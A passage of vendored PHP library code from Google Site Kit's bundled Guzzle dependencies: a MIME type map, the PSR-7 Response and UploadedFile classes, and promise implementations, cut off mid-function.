'application/timestamped-data', 'tsv' => 'text/tab-separated-values', 'ttc' => 'font/collection', 'ttf' => 'font/ttf', 'ttl' => 'text/turtle', 'ttml' => 'application/ttml+xml', 'twd' => 'application/vnd.simtech-mindmapper', 'twds' => 'application/vnd.simtech-mindmapper', 'txd' => 'application/vnd.genomatix.tuxedo', 'txf' => 'application/vnd.mobius.txf', 'txt' => 'text/plain', 'u3d' => 'model/u3d', 'u8dsn' => 'message/global-delivery-status', 'u8hdr' => 'message/global-headers', 'u8mdn' => 'message/global-disposition-notification', 'u8msg' => 'message/global', 'u32' => 'application/x-authorware-bin', 'ubj' => 'application/ubjson', 'udeb' => 'application/x-debian-package', 'ufd' => 'application/vnd.ufdl', 'ufdl' => 'application/vnd.ufdl', 'ulx' => 'application/x-glulx', 'umj' => 'application/vnd.umajin', 'unityweb' => 'application/vnd.unity', 'uo' => 'application/vnd.uoml+xml', 'uoml' => 'application/vnd.uoml+xml', 'uri' => 'text/uri-list', 'uris' => 'text/uri-list', 'urls' => 'text/uri-list', 'usda' => 'model/vnd.usda', 'usdz' => 'model/vnd.usdz+zip', 'ustar' => 'application/x-ustar', 'utz' => 'application/vnd.uiq.theme', 'uu' => 'text/x-uuencode', 'uva' => 'audio/vnd.dece.audio', 'uvd' => 'application/vnd.dece.data', 'uvf' => 'application/vnd.dece.data', 'uvg' => 'image/vnd.dece.graphic', 'uvh' => 'video/vnd.dece.hd', 'uvi' => 'image/vnd.dece.graphic', 'uvm' => 'video/vnd.dece.mobile', 'uvp' => 'video/vnd.dece.pd', 'uvs' => 'video/vnd.dece.sd', 'uvt' => 'application/vnd.dece.ttml+xml', 'uvu' => 'video/vnd.uvvu.mp4', 'uvv' => 'video/vnd.dece.video', 'uvva' => 'audio/vnd.dece.audio', 'uvvd' => 'application/vnd.dece.data', 'uvvf' => 'application/vnd.dece.data', 'uvvg' => 'image/vnd.dece.graphic', 'uvvh' => 'video/vnd.dece.hd', 'uvvi' => 'image/vnd.dece.graphic', 'uvvm' => 'video/vnd.dece.mobile', 'uvvp' => 'video/vnd.dece.pd', 'uvvs' => 'video/vnd.dece.sd', 'uvvt' => 'application/vnd.dece.ttml+xml', 'uvvu' => 'video/vnd.uvvu.mp4', 'uvvv' => 'video/vnd.dece.video', 'uvvx' => 'application/vnd.dece.unspecified', 'uvvz' => 'application/vnd.dece.zip', 'uvx' => 'application/vnd.dece.unspecified', 'uvz' => 'application/vnd.dece.zip', 'vbox' => 'application/x-virtualbox-vbox', 'vbox-extpack' => 'application/x-virtualbox-vbox-extpack', 'vcard' => 'text/vcard', 'vcd' => 'application/x-cdlink', 'vcf' => 'text/x-vcard', 'vcg' => 'application/vnd.groove-vcard', 'vcs' => 'text/x-vcalendar', 'vcx' => 'application/vnd.vcx', 'vdi' => 'application/x-virtualbox-vdi', 'vds' => 'model/vnd.sap.vds', 'vhd' => 'application/x-virtualbox-vhd', 'vis' => 'application/vnd.visionary', 'viv' => 'video/vnd.vivo', 'vlc' => 'application/videolan', 'vmdk' => 'application/x-virtualbox-vmdk', 'vob' => 'video/x-ms-vob', 'vor' => 'application/vnd.stardivision.writer', 'vox' => 'application/x-authorware-bin', 'vrml' => 'model/vrml', 'vsd' => 'application/vnd.visio', 'vsf' => 'application/vnd.vsf', 'vss' => 'application/vnd.visio', 'vst' => 'application/vnd.visio', 'vsw' => 'application/vnd.visio', 'vtf' => 'image/vnd.valve.source.texture', 'vtt' => 'text/vtt', 'vtu' => 'model/vnd.vtu', 'vxml' => 'application/voicexml+xml', 'w3d' => 'application/x-director', 'wad' => 'application/x-doom', 'wadl' => 'application/vnd.sun.wadl+xml', 'war' => 'application/java-archive', 'wasm' => 'application/wasm', 'wav' => 'audio/x-wav', 'wax' => 'audio/x-ms-wax', 'wbmp' => 'image/vnd.wap.wbmp', 'wbs' => 'application/vnd.criticaltools.wbs+xml', 'wbxml' => 'application/wbxml', 'wcm' => 'application/vnd.ms-works', 'wdb' => 'application/vnd.ms-works', 'wdp' => 'image/vnd.ms-photo', 'weba' => 'audio/webm', 'webapp' => 'application/x-web-app-manifest+json', 'webm' => 'video/webm', 'webmanifest' => 'application/manifest+json', 'webp' => 'image/webp', 'wg' => 'application/vnd.pmi.widget', 'wgsl' => 'text/wgsl', 'wgt' => 'application/widget', 'wif' => 'application/watcherinfo+xml', 'wks' => 'application/vnd.ms-works', 'wm' => 'video/x-ms-wm', 'wma' => 'audio/x-ms-wma', 'wmd' => 'application/x-ms-wmd', 'wmf' => 'image/wmf', 'wml' => 'text/vnd.wap.wml', 'wmlc' => 'application/wmlc', 'wmls' => 'text/vnd.wap.wmlscript', 'wmlsc' => 'application/vnd.wap.wmlscriptc', 'wmv' => 'video/x-ms-wmv', 'wmx' => 'video/x-ms-wmx', 'wmz' => 'application/x-msmetafile', 'woff' => 'font/woff', 'woff2' => 'font/woff2', 'word' => 'application/msword', 'wpd' => 'application/vnd.wordperfect', 'wpl' => 'application/vnd.ms-wpl', 'wps' => 'application/vnd.ms-works', 'wqd' => 'application/vnd.wqd', 'wri' => 'application/x-mswrite', 'wrl' => 'model/vrml', 'wsc' => 'message/vnd.wfa.wsc', 'wsdl' => 'application/wsdl+xml', 'wspolicy' => 'application/wspolicy+xml', 'wtb' => 'application/vnd.webturbo', 'wvx' => 'video/x-ms-wvx', 'x3d' => 'model/x3d+xml', 'x3db' => 'model/x3d+fastinfoset', 'x3dbz' => 'model/x3d+binary', 'x3dv' => 'model/x3d-vrml', 'x3dvz' => 'model/x3d+vrml', 'x3dz' => 'model/x3d+xml', 'x32' => 'application/x-authorware-bin', 'x_b' => 'model/vnd.parasolid.transmit.binary', 'x_t' => 'model/vnd.parasolid.transmit.text', 'xaml' => 'application/xaml+xml', 'xap' => 'application/x-silverlight-app', 'xar' => 'application/vnd.xara', 'xav' => 'application/xcap-att+xml', 'xbap' => 'application/x-ms-xbap', 'xbd' => 'application/vnd.fujixerox.docuworks.binder', 'xbm' => 'image/x-xbitmap', 'xca' => 'application/xcap-caps+xml', 'xcs' => 'application/calendar+xml', 'xdf' => 'application/xcap-diff+xml', 'xdm' => 'application/vnd.syncml.dm+xml', 'xdp' => 'application/vnd.adobe.xdp+xml', 'xdssc' => 'application/dssc+xml', 'xdw' => 'application/vnd.fujixerox.docuworks', 'xel' => 'application/xcap-el+xml', 'xenc' => 'application/xenc+xml', 'xer' => 'application/patch-ops-error+xml', 'xfdf' => 'application/xfdf', 'xfdl' => 'application/vnd.xfdl', 'xht' => 'application/xhtml+xml', 'xhtm' => 'application/vnd.pwg-xhtml-print+xml', 'xhtml' => 'application/xhtml+xml', 'xhvml' => 'application/xv+xml', 'xif' => 'image/vnd.xiff', 'xl' => 'application/excel', 'xla' => 'application/vnd.ms-excel', 'xlam' => 'application/vnd.ms-excel.addin.macroEnabled.12', 'xlc' => 'application/vnd.ms-excel', 'xlf' => 'application/xliff+xml', 'xlm' => 'application/vnd.ms-excel', 'xls' => 'application/vnd.ms-excel', 'xlsb' => 'application/vnd.ms-excel.sheet.binary.macroEnabled.12', 'xlsm' => 'application/vnd.ms-excel.sheet.macroEnabled.12', 'xlsx' => 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'xlt' => 'application/vnd.ms-excel', 'xltm' => 'application/vnd.ms-excel.template.macroEnabled.12', 'xltx' => 'application/vnd.openxmlformats-officedocument.spreadsheetml.template', 'xlw' => 'application/vnd.ms-excel', 'xm' => 'audio/xm', 'xml' => 'application/xml', 'xns' => 'application/xcap-ns+xml', 'xo' => 'application/vnd.olpc-sugar', 'xop' => 'application/xop+xml', 'xpi' => 'application/x-xpinstall', 'xpl' => 'application/xproc+xml', 'xpm' => 'image/x-xpixmap', 'xpr' => 'application/vnd.is-xpr', 'xps' => 'application/vnd.ms-xpsdocument', 'xpw' => 'application/vnd.intercon.formnet', 'xpx' => 'application/vnd.intercon.formnet', 'xsd' => 'application/xml', 'xsf' => 'application/prs.xsf+xml', 'xsl' => 'application/xml', 'xslt' => 'application/xslt+xml', 'xsm' => 'application/vnd.syncml+xml', 'xspf' => 'application/xspf+xml', 'xul' => 'application/vnd.mozilla.xul+xml', 'xvm' => 'application/xv+xml', 'xvml' => 'application/xv+xml', 'xwd' => 'image/x-xwindowdump', 'xyz' => 'chemical/x-xyz', 'xz' => 'application/x-xz', 'yaml' => 'text/yaml', 'yang' => 'application/yang', 'yin' => 'application/yin+xml', 'yml' => 'text/yaml', 'ymp' => 'text/x-suse-ymp', 'z' => 'application/x-compress', 'z1' => 'application/x-zmachine', 'z2' => 'application/x-zmachine', 'z3' => 'application/x-zmachine', 'z4' => 'application/x-zmachine', 'z5' => 'application/x-zmachine', 'z6' => 'application/x-zmachine', 'z7' => 'application/x-zmachine', 'z8' => 'application/x-zmachine', 'zaz' => 'application/vnd.zzazz.deck+xml', 'zip' => 'application/zip', 'zir' => 'application/vnd.zul', 'zirz' => 'application/vnd.zul', 'zmm' => 'application/vnd.handheld-entertainment+xml', 'zsh' => 'text/x-scriptzsh']; /** * Determines the mimetype of a file by looking at its extension. * * @see https://raw.githubusercontent.com/jshttp/mime-db/master/db.json */ public static function fromFilename(string $filename) : ?string { return self::fromExtension(\pathinfo($filename, \PATHINFO_EXTENSION)); } /** * Maps a file extensions to a mimetype. * * @see https://raw.githubusercontent.com/jshttp/mime-db/master/db.json */ public static function fromExtension(string $extension) : ?string { return self::MIME_TYPES[\strtolower($extension)] ?? null; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * PSR-7 response implementation. */ class Response implements \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { use MessageTrait; /** Map of standard HTTP status code/reason phrases */ private const PHRASES = [100 => 'Continue', 101 => 'Switching Protocols', 102 => 'Processing', 200 => 'OK', 201 => 'Created', 202 => 'Accepted', 203 => 'Non-Authoritative Information', 204 => 'No Content', 205 => 'Reset Content', 206 => 'Partial Content', 207 => 'Multi-status', 208 => 'Already Reported', 300 => 'Multiple Choices', 301 => 'Moved Permanently', 302 => 'Found', 303 => 'See Other', 304 => 'Not Modified', 305 => 'Use Proxy', 306 => 'Switch Proxy', 307 => 'Temporary Redirect', 308 => 'Permanent Redirect', 400 => 'Bad Request', 401 => 'Unauthorized', 402 => 'Payment Required', 403 => 'Forbidden', 404 => 'Not Found', 405 => 'Method Not Allowed', 406 => 'Not Acceptable', 407 => 'Proxy Authentication Required', 408 => 'Request Time-out', 409 => 'Conflict', 410 => 'Gone', 411 => 'Length Required', 412 => 'Precondition Failed', 413 => 'Request Entity Too Large', 414 => 'Request-URI Too Large', 415 => 'Unsupported Media Type', 416 => 'Requested range not satisfiable', 417 => 'Expectation Failed', 418 => 'I\'m a teapot', 422 => 'Unprocessable Entity', 423 => 'Locked', 424 => 'Failed Dependency', 425 => 'Unordered Collection', 426 => 'Upgrade Required', 428 => 'Precondition Required', 429 => 'Too Many Requests', 431 => 'Request Header Fields Too Large', 451 => 'Unavailable For Legal Reasons', 500 => 'Internal Server Error', 501 => 'Not Implemented', 502 => 'Bad Gateway', 503 => 'Service Unavailable', 504 => 'Gateway Time-out', 505 => 'HTTP Version not supported', 506 => 'Variant Also Negotiates', 507 => 'Insufficient Storage', 508 => 'Loop Detected', 510 => 'Not Extended', 511 => 'Network Authentication Required']; /** @var string */ private $reasonPhrase; /** @var int */ private $statusCode; /** * @param int $status Status code * @param (string|string[])[] $headers Response headers * @param string|resource|StreamInterface|null $body Response body * @param string $version Protocol version * @param string|null $reason Reason phrase (when empty a default will be used based on the status code) */ public function __construct(int $status = 200, array $headers = [], $body = null, string $version = '1.1', ?string $reason = null) { $this->assertStatusCodeRange($status); $this->statusCode = $status; if ($body !== '' && $body !== null) { $this->stream = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($body); } $this->setHeaders($headers); if ($reason == '' && isset(self::PHRASES[$this->statusCode])) { $this->reasonPhrase = self::PHRASES[$this->statusCode]; } else { $this->reasonPhrase = (string) $reason; } $this->protocol = $version; } public function getStatusCode() : int { return $this->statusCode; } public function getReasonPhrase() : string { return $this->reasonPhrase; } public function withStatus($code, $reasonPhrase = '') : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { $this->assertStatusCodeIsInteger($code); $code = (int) $code; $this->assertStatusCodeRange($code); $new = clone $this; $new->statusCode = $code; if ($reasonPhrase == '' && isset(self::PHRASES[$new->statusCode])) { $reasonPhrase = self::PHRASES[$new->statusCode]; } $new->reasonPhrase = (string) $reasonPhrase; return $new; } /** * @param mixed $statusCode */ private function assertStatusCodeIsInteger($statusCode) : void { if (\filter_var($statusCode, \FILTER_VALIDATE_INT) === \false) { throw new \InvalidArgumentException('Status code must be an integer value.'); } } private function assertStatusCodeRange(int $statusCode) : void { if ($statusCode < 100 || $statusCode >= 600) { throw new \InvalidArgumentException('Status code must be an integer value between 1xx and 5xx.'); } } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use InvalidArgumentException; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileInterface; use RuntimeException; class UploadedFile implements \Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileInterface { private const ERRORS = [\UPLOAD_ERR_OK, \UPLOAD_ERR_INI_SIZE, \UPLOAD_ERR_FORM_SIZE, \UPLOAD_ERR_PARTIAL, \UPLOAD_ERR_NO_FILE, \UPLOAD_ERR_NO_TMP_DIR, \UPLOAD_ERR_CANT_WRITE, \UPLOAD_ERR_EXTENSION]; /** * @var string|null */ private $clientFilename; /** * @var string|null */ private $clientMediaType; /** * @var int */ private $error; /** * @var string|null */ private $file; /** * @var bool */ private $moved = \false; /** * @var int|null */ private $size; /** * @var StreamInterface|null */ private $stream; /** * @param StreamInterface|string|resource $streamOrFile */ public function __construct($streamOrFile, ?int $size, int $errorStatus, ?string $clientFilename = null, ?string $clientMediaType = null) { $this->setError($errorStatus); $this->size = $size; $this->clientFilename = $clientFilename; $this->clientMediaType = $clientMediaType; if ($this->isOk()) { $this->setStreamOrFile($streamOrFile); } } /** * Depending on the value set file or stream variable * * @param StreamInterface|string|resource $streamOrFile * * @throws InvalidArgumentException */ private function setStreamOrFile($streamOrFile) : void { if (\is_string($streamOrFile)) { $this->file = $streamOrFile; } elseif (\is_resource($streamOrFile)) { $this->stream = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Stream($streamOrFile); } elseif ($streamOrFile instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface) { $this->stream = $streamOrFile; } else { throw new \InvalidArgumentException('Invalid stream or file provided for UploadedFile'); } } /** * @throws InvalidArgumentException */ private function setError(int $error) : void { if (\false === \in_array($error, \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UploadedFile::ERRORS, \true)) { throw new \InvalidArgumentException('Invalid error status for UploadedFile'); } $this->error = $error; } private static function isStringNotEmpty($param) : bool { return \is_string($param) && \false === empty($param); } /** * Return true if there is no upload error */ private function isOk() : bool { return $this->error === \UPLOAD_ERR_OK; } public function isMoved() : bool { return $this->moved; } /** * @throws RuntimeException if is moved or not ok */ private function validateActive() : void { if (\false === $this->isOk()) { throw new \RuntimeException('Cannot retrieve stream due to upload error'); } if ($this->isMoved()) { throw new \RuntimeException('Cannot retrieve stream after it has already been moved'); } } public function getStream() : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { $this->validateActive(); if ($this->stream instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface) { return $this->stream; } /** @var string $file */ $file = $this->file; return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\LazyOpenStream($file, 'r+'); } public function moveTo($targetPath) : void { $this->validateActive(); if (\false === self::isStringNotEmpty($targetPath)) { throw new \InvalidArgumentException('Invalid path provided for move operation; must be a non-empty string'); } if ($this->file) { $this->moved = \PHP_SAPI === 'cli' ? \rename($this->file, $targetPath) : \move_uploaded_file($this->file, $targetPath); } else { \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::copyToStream($this->getStream(), new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\LazyOpenStream($targetPath, 'w')); $this->moved = \true; } if (\false === $this->moved) { throw new \RuntimeException(\sprintf('Uploaded file could not be moved to %s', $targetPath)); } } public function getSize() : ?int { return $this->size; } public function getError() : int { return $this->error; } public function getClientFilename() : ?string { return $this->clientFilename; } public function getClientMediaType() : ?string { return $this->clientMediaType; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * A promise that has been fulfilled. * * Thenning off of this promise will invoke the onFulfilled callback * immediately and ignore other callbacks. * * @final */ class FulfilledPromise implements \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { private $value; /** * @param mixed $value */ public function __construct($value) { if (\is_object($value) && \method_exists($value, 'then')) { throw new \InvalidArgumentException('You cannot create a FulfilledPromise with a promise.'); } $this->value = $value; } public function then(?callable $onFulfilled = null, ?callable $onRejected = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { // Return itself if there is no onFulfilled function. if (!$onFulfilled) { return $this; } $queue = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Utils::queue(); $p = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise([$queue, 'run']); $value = $this->value; $queue->add(static function () use($p, $value, $onFulfilled) : void { if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::pending($p)) { try { $p->resolve($onFulfilled($value)); } catch (\Throwable $e) { $p->reject($e); } } }); return $p; } public function otherwise(callable $onRejected) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->then(null, $onRejected); } public function wait(bool $unwrap = \true) { return $unwrap ? $this->value : null; } public function getState() : string { return self::FULFILLED; } public function resolve($value) : void { if ($value !== $this->value) { throw new \LogicException('Cannot resolve a fulfilled promise'); } } public function reject($reason) : void { throw new \LogicException('Cannot reject a fulfilled promise'); } public function cancel() : void { // pass } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * A promise represents the eventual result of an asynchronous operation. * * The primary way of interacting with a promise is through its then method, * which registers callbacks to receive either a promise’s eventual value or * the reason why the promise cannot be fulfilled. * * @see https://promisesaplus.com/ */ interface PromiseInterface { public const PENDING = 'pending'; public const FULFILLED = 'fulfilled'; public const REJECTED = 'rejected'; /** * Appends fulfillment and rejection handlers to the promise, and returns * a new promise resolving to the return value of the called handler. * * @param callable $onFulfilled Invoked when the promise fulfills. * @param callable $onRejected Invoked when the promise is rejected. */ public function then(?callable $onFulfilled = null, ?callable $onRejected = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; /** * Appends a rejection handler callback to the promise, and returns a new * promise resolving to the return value of the callback if it is called, * or to its original fulfillment value if the promise is instead * fulfilled. * * @param callable $onRejected Invoked when the promise is rejected. */ public function otherwise(callable $onRejected) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; /** * Get the state of the promise ("pending", "rejected", or "fulfilled"). * * The three states can be checked against the constants defined on * PromiseInterface: PENDING, FULFILLED, and REJECTED. */ public function getState() : string; /** * Resolve the promise with the given value. * * @param mixed $value * * @throws \RuntimeException if the promise is already resolved. */ public function resolve($value) : void; /** * Reject the promise with the given reason. * * @param mixed $reason * * @throws \RuntimeException if the promise is already resolved. */ public function reject($reason) : void; /** * Cancels the promise if possible. * * @see https://github.com/promises-aplus/cancellation-spec/issues/7 */ public function cancel() : void; /** * Waits until the promise completes if possible. * * Pass $unwrap as true to unwrap the result of the promise, either * returning the resolved value or throwing the rejected exception. * * If the promise cannot be waited on, then the promise will be rejected. * * @return mixed * * @throws \LogicException if the promise has no wait function or if the * promise does not settle after waiting. */ public function wait(bool $unwrap = \true); } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; use Generator; use Throwable; /** * Creates a promise that is resolved using a generator that yields values or * promises (somewhat similar to C#'s async keyword). * * When called, the Coroutine::of method will start an instance of the generator * and returns a promise that is fulfilled with its final yielded value. * * Control is returned back to the generator when the yielded promise settles. * This can lead to less verbose code when doing lots of sequential async calls * with minimal processing in between. * * use GuzzleHttp\Promise; * * function createPromise($value) { * return new Promise\FulfilledPromise($value); * } * * $promise = Promise\Coroutine::of(function () { * $value = (yield createPromise('a')); * try { * $value = (yield createPromise($value . 'b')); * } catch (\Throwable $e) { * // The promise was rejected. * } * yield $value . 'c'; * }); * * // Outputs "abc" * $promise->then(function ($v) { echo $v; }); * * @param callable $generatorFn Generator function to wrap into a promise. * * @return Promise * * @see https://github.com/petkaantonov/bluebird/blob/master/API.md#generators inspiration */ final class Coroutine implements \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { /** * @var PromiseInterface|null */ private $currentPromise; /** * @var Generator */ private $generator; /** * @var Promise */ private $result; public function __construct(callable $generatorFn) { $this->generator = $generatorFn(); $this->result = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise(function () : void { while (isset($this->currentPromise)) { $this->currentPromise->wait(); } }); try { $this->nextCoroutine($this->generator->current()); } catch (\Throwable $throwable) { $this->result->reject($throwable); } } /** * Create a new coroutine. */ public static function of(callable $generatorFn) : self { return new self($generatorFn); } public function then(?callable $onFulfilled = null, ?callable $onRejected = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->result->then($onFulfilled, $onRejected); } public function otherwise(callable $onRejected) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->result->otherwise($onRejected); } public function wait(bool $unwrap = \true) { return $this->result->wait($unwrap); } public function getState() : string { return $this->result->getState(); } public function resolve($value) : void { $this->result->resolve($value); } public function reject($reason) : void { $this->result->reject($reason); } public function cancel() : void { $this->currentPromise->cancel(); $this->result->cancel(); } private function nextCoroutine($yielded) : void { $this->currentPromise = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::promiseFor($yielded)->then([$this, '_handleSuccess'], [$this, '_handleFailure']); } /** * @internal */ public function _handleSuccess($value) : void { unset($this->currentPromise); try { $next = $this->generator->send($value); if ($this->generator->valid()) { $this->nextCoroutine($next); } else { $this->result->resolve($value); } } catch (\Throwable $throwable) { $this->result->reject($throwable); } } /** * @internal */ public function _handleFailure($reason) : void { unset($this->currentPromise); try { $nextYield = $this->generator->throw(\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::exceptionFor($reason)); // The throw was caught, so keep iterating on the coroutine $this->nextCoroutine($nextYield); } catch (\Throwable $throwable) { $this->result->reject($throwable); } } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * Interface used with classes that return a promise. */ interface PromisorInterface { /** * Returns a promise. */ public function promise() : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; interface TaskQueueInterface { /** * Returns true if the queue is empty. */ public function isEmpty() : bool; /** * Adds a task to the queue that will be executed the next time run is * called. */ public function add(callable $task) : void; /** * Execute all of the pending task in the queue. */ public function run() : void; } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; final class Is { /** * Returns true if a promise is pending. */ public static function pending(\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface $promise) : bool { return $promise->getState() === \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::PENDING; } /** * Returns true if a promise is fulfilled or rejected. */ public static function settled(\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface $promise) : bool { return $promise->getState() !== \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::PENDING; } /** * Returns true if a promise is fulfilled. */ public static function fulfilled(\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface $promise) : bool { return $promise->getState() === \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::FULFILLED; } /** * Returns true if a promise is rejected. */ public static function rejected(\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface $promise) : bool { return $promise->getState() === \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::REJECTED; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * Promises/A+ implementation that avoids recursion when possible. * * @see https://promisesaplus.com/ * * @final */ class Promise implements \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { private $state = self::PENDING; private $result; private $cancelFn; private $waitFn; private $waitList; private $handlers = []; /** * @param callable $waitFn Fn that when invoked resolves the promise. * @param callable $cancelFn Fn that when invoked cancels the promise. */ public function __construct(?callable $waitFn = null, ?callable $cancelFn = null) { $this->waitFn = $waitFn; $this->cancelFn = $cancelFn; } public function then(?callable $onFulfilled = null, ?callable $onRejected = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { if ($this->state === self::PENDING) { $p = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise(null, [$this, 'cancel']); $this->handlers[] = [$p, $onFulfilled, $onRejected]; $p->waitList = $this->waitList; $p->waitList[] = $this; return $p; } // Return a fulfilled promise and immediately invoke any callbacks. if ($this->state === self::FULFILLED) { $promise = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::promiseFor($this->result); return $onFulfilled ? $promise->then($onFulfilled) : $promise; } // It's either cancelled or rejected, so return a rejected promise // and immediately invoke any callbacks. $rejection = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($this->result); return $onRejected ? $rejection->then(null, $onRejected) : $rejection; } public function otherwise(callable $onRejected) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->then(null, $onRejected); } public function wait(bool $unwrap = \true) { $this->waitIfPending(); if ($this->result instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface) { return $this->result->wait($unwrap); } if ($unwrap) { if ($this->state === self::FULFILLED) { return $this->result; } // It's rejected so "unwrap" and throw an exception. throw \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::exceptionFor($this->result); } } public function getState() : string { return $this->state; } public function cancel() : void { if ($this->state !== self::PENDING) { return; } $this->waitFn = $this->waitList = null; if ($this->cancelFn) { $fn = $this->cancelFn; $this->cancelFn = null; try { $fn(); } catch (\Throwable $e) { $this->reject($e); } } // Reject the promise only if it wasn't rejected in a then callback. /** @psalm-suppress RedundantCondition */ if ($this->state === self::PENDING) { $this->reject(new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\CancellationException('Promise has been cancelled')); } } public function resolve($value) : void { $this->settle(self::FULFILLED, $value); } public function reject($reason) : void { $this->settle(self::REJECTED, $reason); } private function settle(string $state, $value) : void { if ($this->state !== self::PENDING) { // Ignore calls with the same resolution. if ($state === $this->state && $value === $this->result) { return; } throw $this->state === $state ? new \LogicException("The promise is already {$state}.") : new \LogicException("Cannot change a {$this->state} promise to {$state}"); } if ($value === $this) { throw new \LogicException('Cannot fulfill or reject a promise with itself'); } // Clear out the state of the promise but stash the handlers. $this->state = $state; $this->result = $value; $handlers = $this->handlers; $this->handlers = null; $this->waitList = $this->waitFn = null; $this->cancelFn = null; if (!$handlers) { return; } // If the value was not a settled promise or a thenable, then resolve // it in the task queue using the correct ID. if (!\is_object($value) || !\method_exists($value, 'then')) { $id = $state === self::FULFILLED ? 1 : 2; // It's a success, so resolve the handlers in the queue. \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Utils::queue()->add(static function () use($id, $value, $handlers) : void { foreach ($handlers as $handler) { self::callHandler($id, $value, $handler); } }); } elseif ($value instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise && \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::pending($value)) { // We can just merge our handlers onto the next promise. $value->handlers = \array_merge($value->handlers, $handlers); } else { // Resolve the handlers when the forwarded promise is resolved. $value->then(static function ($value) use($handlers) : void { foreach ($handlers as $handler) { self::callHandler(1, $value, $handler); } }, static function ($reason) use($handlers) : void { foreach ($handlers as $handler) { self::callHandler(2, $reason, $handler); } }); } } /** * Call a stack of handlers using a specific callback index and value. * * @param int $index 1 (resolve) or 2 (reject). * @param mixed $value Value to pass to the callback. * @param array $handler Array of handler data (promise and callbacks). */ private static function callHandler(int $index, $value, array $handler) : void { /** @var PromiseInterface $promise */ $promise = $handler[0]; // The promise may have been cancelled or resolved before placing // this thunk in the queue. if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::settled($promise)) { return; } try { if (isset($handler[$index])) { /* * If $f throws an exception, then $handler will be in the exception * stack trace. Since $handler contains a reference to the callable * itself we get a circular reference. We clear the $handler * here to avoid that memory leak. */ $f = $handler[$index]; unset($handler); $promise->resolve($f($value)); } elseif ($index === 1) { // Forward resolution values as-is. $promise->resolve($value); } else { // Forward rejections down the chain. $promise->reject($value); } } catch (\Throwable $reason) { $promise->reject($reason); } } private function waitIfPending() : void { if ($this->state !== self::PENDING) { return; } elseif ($this->waitFn) { $this->invokeWaitFn(); } elseif ($this->waitList) { $this->invokeWaitList(); } else { // If there's no wait function, then reject the promise. $this->reject('Cannot wait on a promise that has ' . 'no internal wait function. You must provide a wait ' . 'function when constructing the promise to be able to ' . 'wait on a promise.'); } \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Utils::queue()->run(); /** @psalm-suppress RedundantCondition */ if 